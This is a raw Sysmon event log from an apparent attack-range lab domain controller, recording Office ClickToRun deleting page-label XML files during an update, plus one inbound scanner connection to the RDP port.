Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL118.XMLMD5=30E140AA9E9CFF63F75D7EF252B8BC20,SHA256=D1EE03FDCE21B33099778CCF4B9E8A12710C5548304A210CC519D92511D8FFC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL117.XMLMD5=615FEF8F32BB52CEFCA34DE0F7174B21,SHA256=E1B219F11785B04CE5DC91289C61D94219115792591E14CF477AA3E05A8FAEAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL116.XMLMD5=41BAF2D4FBD3EA0E9AB7AB8DCF771687,SHA256=78F29D21991C840FFD084B0C59535837971836E8585A5F541991DE7F250BB812,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL115.XMLMD5=416DF8123096B2400065C1529EC0AD36,SHA256=BBFA236EF383AA153BEA67CFC441E9079C6C4D87C7A14156964837BB5051B2D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL112.XMLMD5=726707599B04EE4BBBEC432B43BF386F,SHA256=39C7C46D0A56A231C8B8A751ED95766C0182BB669AF1FA9BB21E772A1F6DFD0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL111.XMLMD5=603C7B1A78D6DDF2C51DF9E3CB2C9B97,SHA256=7D8E7D68A4AA28EF97AC35FF245F59F3ACB1A54263B17710D43B71DEB2D1A8F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL110.XMLMD5=36A9121637E134D180436BCD7F3AFF58,SHA256=8A8ECF0E876EA39FF569867E286BDA83C5388E696875E7D01BCF05513CDDEA81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL109.XMLMD5=CD6B363100212A34A9EA268800A86751,SHA256=DAA320D9B002682B0663F058DA2EB9E1EDDC17D1C92490B1BC4E7830C48A1608,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL108.XMLMD5=2DCD6A139CA6DD0BC535B8C134638466,SHA256=4AD99A8A5F33F18F50F472E21D4767BF0C55BE0135CB8B6A46AB6539FA32342B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL107.XMLMD5=0CCC389546A18CFDC5D078AB0A6E8C67,SHA256=B8FA2C3C1BE5DF5543835C623987B36AA44A803A749CB525D39CCD47F36C8D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL106.XMLMD5=6A5B55BD05401BD3F83C04DB40BECB53,SHA256=3BBA3432D7BDE5C6434C0BC59D106358F6D8EE4F1800B5365DC5BBCBF7CB8600,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL105.XMLMD5=FD1E2182DDB025B2D6432F01D4A4875D,SHA256=74B750F4DC62C1CA2D60449BD6D975BC6060B039737769846F8F01FDFD41BC96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL104.XMLMD5=527389308C3EBA2B3D2E9E3C86BD9C99,SHA256=9124F5C64F0254A0AF24BF771BF4E779DB78BCD08DBB7716693F5DC410F193A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL103.XMLMD5=FBB72C4BD361151DF75D82B842AE4D44,SHA256=9C9319F11310DD33A49F5381D0B2A2CECE3965677E9BF55457367071A9856FDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL102.XMLMD5=5DDE3EADA47970D36D20BB4CB8558085,SHA256=54FCC9E187D6D9F560D9D0C536B03ED63A6E62FB1727D0F6E69B69EA26DE1831,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL097.XMLMD5=6723EAA67E430FEF5DF66B73F47CFFDC,SHA256=4207FA5431A6349AD964260DE42260248CAABD8F8D7993BCB5CCA1E02FE8BEA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL096.XMLMD5=BC84EF8E5CC170ECF97210B0919ABEF4,SHA256=2A714D26FF174FFAA188B33501DE08A3642B56B0894DAFAA4030F47F30137097,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL095.XMLMD5=6D01ECDE06A113953012E7E3DFA34B3F,SHA256=0A12520112E54581828AF93D995957D7BE9AE5288FF363D01B63B48F4BF4E2DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL093.XMLMD5=EF894422C2FB7366749339C8B77449B7,SHA256=89B8E7D60DA0176B77084DD617639E335E62D9DE29D02A160EBF2D726E09AD4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL092.XMLMD5=52B85FBFCA1458FCCA36321C4C4DD92B,SHA256=C978EB08B4F2BCE81EFF46A0AD3A1917CFB9F1667BAE1A2F81D0F67AABE5E4C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL090.XMLMD5=7B3A7A3BFDEA935AD8F1FA1FC716F67E,SHA256=5AC720E4552AEDF0B064E4C9E8ED0F7DCB60E2C0E5024A873DE74FFB3A2DF9F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL089.XMLMD5=A80F1BE8DFD3E8A94AE87233E1C66C58,SHA256=64ABDBFFA3371B951957FFC8A66AD4119E412FEF01708A647991A30294D54DBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL087.XMLMD5=1788527A66146296CEE9F0D33618A8CC,SHA256=ACC3B6514062AC7EC9E87E2D90AC58EE1FCC16DDEA351499726C5A6AA3F8740D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL086.XMLMD5=3DAB0549D14B9EB2966342FBE2CD8FDE,SHA256=60D13DD8B078373D839D0C234400177B15D71C01480E004FEEF89755B46FAEF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL083.XMLMD5=78D442905BDDE4D6A2A411172AB682C0,SHA256=3B4471B91D7F2A562D134CCDB481D1D6A0545703265908799F8E5C8E426C572E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL082.XMLMD5=DB5C6F03B6E7F776FED09A6A0D2575A4,SHA256=B9224EC10C9A7BAAAC711C79E2A95C9F4D92398808EF4153E088D6A11BAF43C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL081.XMLMD5=C8781A07208CD207A08CEBD8FFD18E36,SHA256=2B01C065208939350EAC1BC976E3FC0CBEAED43067BF1561330EDE0D083E4213,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL078.XMLMD5=EE554A1B66D2525F6C7C7F756736D9E0,SHA256=D94A85ABFBE72E6E3260293F183C3FCB4786CB842723B9FA677D04B6A2B090E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL077.XMLMD5=ACB1092943EDB2F4D1127DA4CA16984D,SHA256=736C8CAA73A5271D9331BC4CACCBC60D6705866C61F20FDDE800DE6B903F93AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL075.XMLMD5=FC2D6E617C038FB5AEEF79B81150E83F,SHA256=615543A30240EFE4793855F23D0EFCEB98FF34E963B34109A0CF86D4CC870145,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL065.XMLMD5=FE5272ED6B7525705B9838AEE497539C,SHA256=C397168D99F882A768612C7E0EB292AA28E69892D6D5912033EF3D91719959F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000069374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.362{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54675-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000069373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL058.XMLMD5=5EF47E99BA860FC4945ED6C6F024B32D,SHA256=AECD2DACEA01801F5601BAA1A03A0D840DB0E9A3143F93B861155360D7D683EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL054.XMLMD5=6DBE7732AB9E74287EA0417888E25570,SHA256=9647B40B575B98A2F8F8C3F0E090F37A0C4C0B694CBF555F65D6289F1DDD36BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL048.XMLMD5=ED05CA2FD6FE674C2953286DDA63445C,SHA256=8C06A52C6B0D344B29C4FCF8E7607922E74FE92A1A3E5B10ED667389DDD3F5D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL044.XMLMD5=767D1456B538F4E824F0389F3DD50141,SHA256=66C6B56DF5B76A50B2D787729E1F8821717299C78291EC2BD93959DC5066E0E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL027.XMLMD5=B36916F82F628A7B2C46F931D2A16AFB,SHA256=AB790F6E12F98E7607203F14E09229A537020F6E45B4045F0AE3B9D67C903734,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL026.XMLMD5=DBEA823572BB2727BBE599B1ABD4340D,SHA256=C3886F9B4E74684FC0C620914C7324669EF2A854BFC9E30DBFE720AFCF6512F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL022.XMLMD5=8816377173A180B0989102274F5844EB,SHA256=AFB31136A944A971C55A3714BDE3987670FA9D51E83819FB3D1B24C9DC81F499,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL020.XMLMD5=567D5D54B7057B0656664B87A4CCE230,SHA256=5D0D894FDF1F48940848754E285125DC71EB80583359E9640EAA9FC42C1084BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL016.XMLMD5=08711BFBF2B16685984FE2D50480B24F,SHA256=07BB5578F273E2F69A592146E97AF47FB7356BC7C3408CE3EF8170E7AC1D323B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL012.XMLMD5=0BD5B908FD2414CB358E7F5B92A64C82,SHA256=3807E25C7CEE959D5E0FE48763A72B4D9AB8527654031667557A8F34C820168C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL011.XMLMD5=A3DC5F3EA9B3FA4DCC1F7F2C31A379D8,SHA256=5883B8E7E9968A58B527E6A0A57993268DBE1EB9EC55C1830AC8B8C0D4A31BC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL010.XMLMD5=962C75F27CFDDCF71DB79E0A77448BC2,SHA256=CCDAD2EDC6ABB83E3A14C35F53399FA94359C1E4242C36F7057D53ABD4063BED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL002.XMLMD5=1864C5301B7FD57BC009898E0FDCE7CA,SHA256=34F1A9349DC20E168090D0751FEDD29C718F86DE15DEEB6C0C9C8C7C238F66FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 